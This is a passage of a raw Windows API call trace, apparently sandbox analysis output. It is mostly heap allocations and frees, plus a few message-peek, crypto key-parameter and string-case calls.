(in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da268 | out: hHeap=0x770000) returned 1 [0037.421] PeekMessageW (in: lpMsg=0x6adcd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6adcd4) returned 0 [0037.421] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0037.422] CryptGetKeyParam (in: hKey=0x7c2280, dwParam=0x7, pbData=0x7da2b8, pdwDataLen=0x6adcf0, dwFlags=0x0 | out: pbData=0x7da2b8*=0x660e, pdwDataLen=0x6adcf0*=0x4) returned 1 [0037.422] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2e8 [0037.422] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0037.422] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0037.422] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0037.422] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0037.422] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0037.422] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2d8 [0037.422] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0037.422] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2d8 | out: hHeap=0x770000) returned 1 [0037.422] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0037.422] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0037.422] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0037.422] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd00 [0037.422] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2d8 [0037.422] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd00 | out: hHeap=0x770000) returned 1 [0037.422] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2d8 | out: hHeap=0x770000) returned 1 [0037.422] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0037.422] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0037.422] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd00 [0037.422] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cca0 [0037.422] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2d8 [0037.422] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cca0 | out: hHeap=0x770000) returned 1 [0037.422] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2d8 | out: hHeap=0x770000) returned 1 [0037.422] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd00 | out: hHeap=0x770000) returned 1 [0037.422] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd00 [0037.422] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cca0 [0037.422] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0037.422] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2d8 [0037.422] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0037.423] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2d8 | out: hHeap=0x770000) returned 1 [0037.423] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cca0 | out: hHeap=0x770000) returned 1 [0037.423] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cca0 [0037.423] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0037.423] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0037.423] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2d8 [0037.423] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0037.423] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2d8 | out: hHeap=0x770000) returned 1 [0037.423] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0037.423] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0037.423] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0037.423] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0037.423] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2d8 [0037.423] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0037.423] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2d8 | out: hHeap=0x770000) returned 1 [0037.423] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0037.423] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da268 | out: hHeap=0x770000) returned 1 [0037.423] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0037.423] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da208 | out: hHeap=0x770000) returned 1 [0037.423] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2f8 | out: hHeap=0x770000) returned 1 [0037.423] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0037.423] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1dc8 | out: hHeap=0x770000) returned 1 [0037.423] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb50 | out: hHeap=0x770000) returned 1 [0037.423] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0037.423] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0037.423] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0037.423] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cec8 | out: hHeap=0x770000) returned 1 [0037.423] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0037.423] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0037.423] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0037.423] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0037.423] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0037.423] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0037.424] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7a8 | out: hHeap=0x770000) returned 1 [0037.424] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0037.424] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0037.424] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0037.424] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0037.424] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0037.424] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0037.424] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0037.424] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0037.424] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0037.424] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0037.424] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0037.424] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da218 | out: hHeap=0x770000) returned 1 [0037.424] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0037.424] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da218 [0037.424] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b87d0 [0037.424] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0037.424] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b87d0 | out: hHeap=0x770000) returned 1 [0037.424] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0037.424] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0037.424] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1a8 [0037.424] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae9a8 [0037.424] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2f8 [0037.424] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2f8 | out: hHeap=0x770000) returned 1 [0037.424] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0037.424] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae9a8 | out: hHeap=0x770000) returned 1 [0037.424] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0037.424] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da218 | out: hHeap=0x770000) returned 1 [0037.424] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2340 [0037.424] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0037.424] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da218 [0037.424] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1dc8 [0037.424] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0037.425] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0037.425] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae9a8 [0037.425] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0037.425] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0037.425] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1a8 [0037.425] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0037.425] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2f8 [0037.425] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0037.425] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0037.425] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0037.425] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0037.425] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0037.425] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2f8 | out: hHeap=0x770000) returned 1 [0037.425] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0037.425] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0037.425] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0037.425] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae9a8 | out: hHeap=0x770000) returned 1 [0037.425] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0037.425] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0037.425] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1dc8 | out: hHeap=0x770000) returned 1 [0037.425] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da218 | out: hHeap=0x770000) returned 1 [0037.425] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0037.425] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0037.425] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0037.425] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0037.425] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0037.425] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd00 | out: hHeap=0x770000) returned 1 [0037.425] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cca0 | out: hHeap=0x770000) returned 1 [0037.425] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0037.425] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0037.425] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0037.425] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0037.425] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0037.426] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0037.426] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3c8 | out: hHeap=0x770000) returned 1 [0037.426] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c60 | out: hHeap=0x770000) returned 1 [0037.426] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0037.426] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1710 | out: hHeap=0x770000) returned 1 [0037.426] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0037.426] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1cd8 | out: hHeap=0x770000) returned 1 [0037.426] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0037.426] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0037.426] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0037.426] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da158 | out: hHeap=0x770000) returned 1 [0037.426] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e138 | out: hHeap=0x770000) returned 1 [0037.426] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0037.426] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2b8 | out: hHeap=0x770000) returned 1 [0037.426] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0037.426] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0037.426] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0037.426] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0037.426] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b16c0 | out: hHeap=0x770000) returned 1 [0037.426] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0037.426] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3a8 | out: hHeap=0x770000) returned 1 [0037.426] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19e0 | out: hHeap=0x770000) returned 1 [0037.426] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0037.426] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18f0 | out: hHeap=0x770000) returned 1 [0037.426] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da358 | out: hHeap=0x770000) returned 1 [0037.426] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.426] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da358 [0037.426] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0037.426] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3a8 [0037.426] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0037.426] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3a8 | out: hHeap=0x770000) returned 1 [0037.426] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da358 | out: hHeap=0x770000) returned 1 [0037.426] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.426] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da358 [0037.427] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3a8 [0037.427] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0037.427] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0037.427] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3a8 | out: hHeap=0x770000) returned 1 [0037.427] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da358 | out: hHeap=0x770000) returned 1 [0037.427] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.427] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.427] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0037.427] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.427] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18f0 [0037.427] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0037.427] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da358 [0037.427] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0037.427] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19e0 [0037.427] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0037.427] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0037.427] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3a8 [0037.427] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0037.427] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3a8 | out: hHeap=0x770000) returned 1 [0037.427] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16c0 [0037.427] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0037.427] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3a8 [0037.427] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0037.427] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0037.427] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0037.427] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0037.427] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0037.427] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1cd8 [0037.427] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0037.427] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0037.427] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0037.428] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0037.428] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2b8 [0037.428] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0037.428] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2b8 | out: hHeap=0x770000) returned 1 [0037.428] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1710 [0037.428] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0037.428] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2b8 [0037.428] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0037.428] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0037.428] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3b8 [0037.428] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0037.428] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0037.428] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c60 [0037.428] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0037.428] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3b8 [0037.428] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0037.428] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1dc8 [0037.428] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0037.428] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0037.428] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da158 [0037.428] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0037.428] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da158 | out: hHeap=0x770000) returned 1 [0037.428] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a80 [0037.428] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0037.428] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da158 [0037.428] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0037.428] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cca0 [0037.428] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da378 [0037.428] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cca0 | out: hHeap=0x770000) returned 1 [0037.428] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0037.428] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.429] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da378 [0037.429] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c88 [0037.429] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0037.429] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c88 | out: hHeap=0x770000) returned 1 [0037.429] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0037.429] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cca0 [0037.429] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0037.429] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0037.429] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da378 [0037.429] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1f8 [0037.429] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0037.429] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0037.429] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0037.429] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: 